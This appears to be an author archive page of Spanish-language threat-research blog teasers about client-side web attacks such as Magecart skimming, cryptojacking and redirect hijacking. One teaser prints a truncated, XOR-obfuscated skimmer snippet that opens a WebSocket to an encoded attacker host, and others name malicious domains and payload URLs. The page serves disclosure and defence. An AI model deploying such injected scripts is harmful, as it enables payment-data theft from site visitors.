Articles by Himanshu Anand
El CryptoJacking ha muerto: larga vida al CryptoJacking
El cryptojacking moderno ha evolucionado hacia ataques silenciosos y de múltiples etapas.
Himanshu AnandMagecart atacando sitios de comercio electrónico del este asiático en OpenCart
Hemos detectado un ataque de tipo Magecart dirigido a la plataforma CMS OpenCart
Himanshu AnandCómo el secuestro de tráfico y el fraude de afiliados pueden perjudicar a sitios web y usuarios
El secuestro de tráfico ocurre cuando alguien modifica en secreto el destino de los enlaces de un sitio web, enviando a los visitantes a otros sitios.
Himanshu Anand¿Es suficiente depender de los Indicadores de Compromiso para estar seguros?
La mayoría de los programas de seguridad actuales siguen dependiendo en gran medida de los Indicadores de Compromiso (IOCs). Este enfoque no logra detectar amenazas que evolucionan lentamente, reutilizan infraestructura u operan en contextos reducidos y de alto valor, como el skimming web del lado del cliente.
Himanshu AnandAtaque del lado del cliente en CoinMarketCap: Un análisis exhaustivo
El 20 de junio de 2025, CoinMarketCap (CMC) —un pilar fundamental del ecosistema de criptomonedas, utilizado por millones de personas para obtener datos cripto en tiempo real— sufrió un incidente de seguridad significativo.
Himanshu AnandGoogle OAuth Weaponizado Activa un WebSocket Malicioso
Un atacante está usando 'Google.com' para entregar y ejecutar su propio código en un ataque de Google OAuth weaponizado.
Himanshu AnandAtaques despiadados del lado del cliente dirigidos a múltiples plataformas con ClickFix
En este artículo, desglosamos una variante reciente de ClickFix que ahora apunta a macOS, Android e iOS, utilizando redirecciones basadas en navegador, mensajes de interfaz de usuario falsos e incluso técnicas de descarga no autorizada.
Himanshu AnandEstafa china para adultos dirigida a usuarios móviles mediante PWA
Hemos identificado una nueva campaña de inyección que abusa de JavaScript de terceros para redirigir a los usuarios.
Himanshu AnandMás de 150.000 sitios web afectados por un secuestro de página completa que redirige a sitios de apuestas chinos
Estimamos que aproximadamente 150.000 sitios web han sido afectados por esta campaña. El script define un array de palabras clave relacionadas con apuestas, juegos de azar y marcas de casinos tanto en inglés como en chino.
Himanshu AnandMiles de sitios web afectados por cuatro puertas traseras en un ataque de JavaScript de terceros
Mientras analizábamos amenazas dirigidas a frameworks de WordPress, encontramos un ataque en el que un único archivo JavaScript de terceros fue utilizado para inyectar cuatro puertas traseras distintas en 1.000 sitios web comprometidos mediante cdn.csyndication[.]com/.
Himanshu AnandMás de 35.000 sitios web atacados en un secuestro de página completa que redirige a una estafa de juego en chino
Una nueva campaña de malware ha comprometido más de 35.000 sitios web, inyectando un script malicioso desde los dominios que se indican a continuación. Una vez que el script se carga, secuestra por completo la ventana del navegador del usuario, redirigiendo frecuentemente a páginas que promocionan una plataforma de juego (o casino) en idioma chino.
Himanshu AnandMás de 10.000 sitios WordPress detectados distribuyendo malware para macOS y Windows
Identificamos más de 10.000 sitios WordPress que mostraban una falsa página de actualización del navegador Google, conduciendo a descargas de malware.
Himanshu AnandSitios web gubernamentales y universitarios atacados en ataque del lado del cliente de ScriptAPI[.]dev
Ayer descubrimos otro ataque de JavaScript del lado del cliente dirigido a más de 500 sitios web, incluyendo gobiernos y universidades. Los scripts inyectados crean enlaces ocultos en el Modelo de Objetos del Documento (DOM), apuntando a sitios web externos, una interfaz de programación para documentos web.
Himanshu AnandEl costo de los falsos positivos - cómo nos convertimos en un objetivo
Esta semana, identificamos un caso de uso intrigante que involucra el ataque WP3[.]XYZ (enlace a nuestra publicación del blog). Despertó interés en toda la comunidad y llevó a mejores tasas de detección en plataformas como VirusTotal (enlace de VirusTotal). Si bien la mayoría apreció nuestros esfuerzos, otros nos criticaron por no identificar la causa raíz o recomendar servicios para limpiar sitios web hackeados. A pesar de esto, nuestro objetivo es hacer que la comunidad esté consciente de los ataques potenciales y prometemos hacerlo aún mejor en el futuro. Cuando los falsos
Himanshu AnandMás de 5,000 sitios de WordPress atrapados en ataque de malware WP3[.]XYZ
Hemos descubierto una campaña de malware generalizada dirigida a sitios web de WordPress, que afecta a más de 5,000 sitios a nivel mundial. El dominio malicioso: \"https://wp3.xyz/plugin[.]php\".
Himanshu AnandNuevo ataque de scripts JS de terceros detectado: Artifyau[.]com y Quantifymy[.]com
Esta semana desplegamos un rastreador especializado con fines de investigación. En tan solo 24 horas, identificó con éxito nuevos patrones de ataque Magecart. Magecart es una amenaza sofisticada y con motivación financiera que inyecta JavaScript malicioso para robar información de pago personal. A continuación, un listado de los mayores ataques Magecart hasta la fecha. Detección inicial: JavaScript ofuscado en Artifyau[.]com. URL detectada: https://artifyau[.]com/T1M0dVluVnBiR1J6YVhSbGNISnZMbU52YlE9PQ/jqwery.js. La URL imita un
Himanshu AnandNuevo código de ataque Magecart al descubierto
El 14 de octubre publicamos un artículo sobre cómo se estaba produciendo otro ataque Magecart en Magento. En ese momento solo identificamos un script como responsable. Hoy pudimos encontrar y analizar el ataque con mayor detalle. El ataque decodificado Este fue el código inyectado: <script> const qbq = [93,89,89,16,5,5,77,89,94,75,94,70,73,4,69,88,77,5,64,67,92,69,21,89,69,95,88,73,79,23]; const zep = 42; window.sss = new WebSocket(String.fromCharCode(...qbq.map(hwo => hwo ^ zep)) + encodeURIComponent(location.h
Himanshu AnandUn sitio de comercio electrónico de Kuwait está siendo utilizado para facilitar ataques de skimming del lado del cliente
Un popular sitio de comercio electrónico en Kuwait, que ejecuta una versión desactualizada de Magento (2.4), ha sido comprometido por una inyección de JavaScript malicioso,
Himanshu AnandAtaque JavaScript Magecart del lado del cliente en Cisco
Otro día, otro ataque JavaScript del lado del cliente de alto perfil. Esta mañana, leímos que Cisco es la próxima víctima de código malicioso que se está cargando
Himanshu AnandAtaque a la cadena de suministro web a través de jQuery troyanizado en npm, GitHub y CDNs
Se han encontrado ataques en jQuery troyanizado en GitHub, npm y jsDelivr en un nuevo ataque a la cadena de suministro web. Cada paquete tenía una copia de jQuery
Himanshu Anand